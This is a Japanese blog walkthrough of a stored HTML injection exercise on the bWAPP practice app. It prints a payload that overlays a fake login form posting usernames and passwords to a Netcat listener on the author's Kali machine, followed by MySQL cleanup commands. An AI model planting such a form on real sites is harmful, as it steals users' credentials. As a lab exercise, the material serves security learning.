shikata ga nai

Private? There is no such things.

bWAPPでA1-HTML Injection - Stored (Blog)をやってみた(再び)

Hello there, ('ω')ノ

 

以前にHTML Injection - Stored (Blog)はやったのですが。

悪意のあるログインフォームを配置することに。

 

f:id:ThisIsOne:20210731134656p:plain

 

さきに別途、仮想マシンのKali LinuxのIPアドレスを確認しておいて。

Netcatでリスナーを起動しておいて。

 

f:id:ThisIsOne:20210731135335p:plain

 

下記のコードをsubmitして。

<div class="test_code">test</div>
<div style="position: absolute; left: 120px; top: 100px; width: 300px; height: 50px; z-index: 1000; background-color:white;">
Please Login:
<form name="login" action="http://192.168.0.49:1234/hacked.html" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="username"/></td>
<td>Password:</td>
<td><input type="password" name="passwd"/></td>
<td><input type="submit" value="Login"/></td>
</tr>
</table>
</form></div>

 

すると、ログインフォームが表示されて。

 

f:id:ThisIsOne:20210731134600p:plain

 

ユーザ名とパスワードを入力してログインボタンを押すと。

 

f:id:ThisIsOne:20210731135206p:plain

 

Kali Linuxへ送信されて。

 

f:id:ThisIsOne:20210731135243p:plain

 

このままだと悪意のコードが保存されたままなので。

Bee-BoxでDBを編集することに。

その前にキーボードを日本語仕様に変更して。

 setxkbmap jp

 

f:id:ThisIsOne:20210731151328p:plain

 

まずは、MYSQLのコマンドツールを起動して。

 mysql -u root -p

 パスワード:bug

 

f:id:ThisIsOne:20210731151240p:plain

 

データベースの確認と選択をして、テーブルの確認を。

 show databases;

 use bWAPP;

 show tables;

 

f:id:ThisIsOne:20210731151659p:plain

 

blogの内容を確認するとさきほどのコードが表示されて。

 select * from blog;

 

f:id:ThisIsOne:20210731151117p:plain

 

blogの内容を削除して。

 delete from blog;

 

f:id:ThisIsOne:20210731151430p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain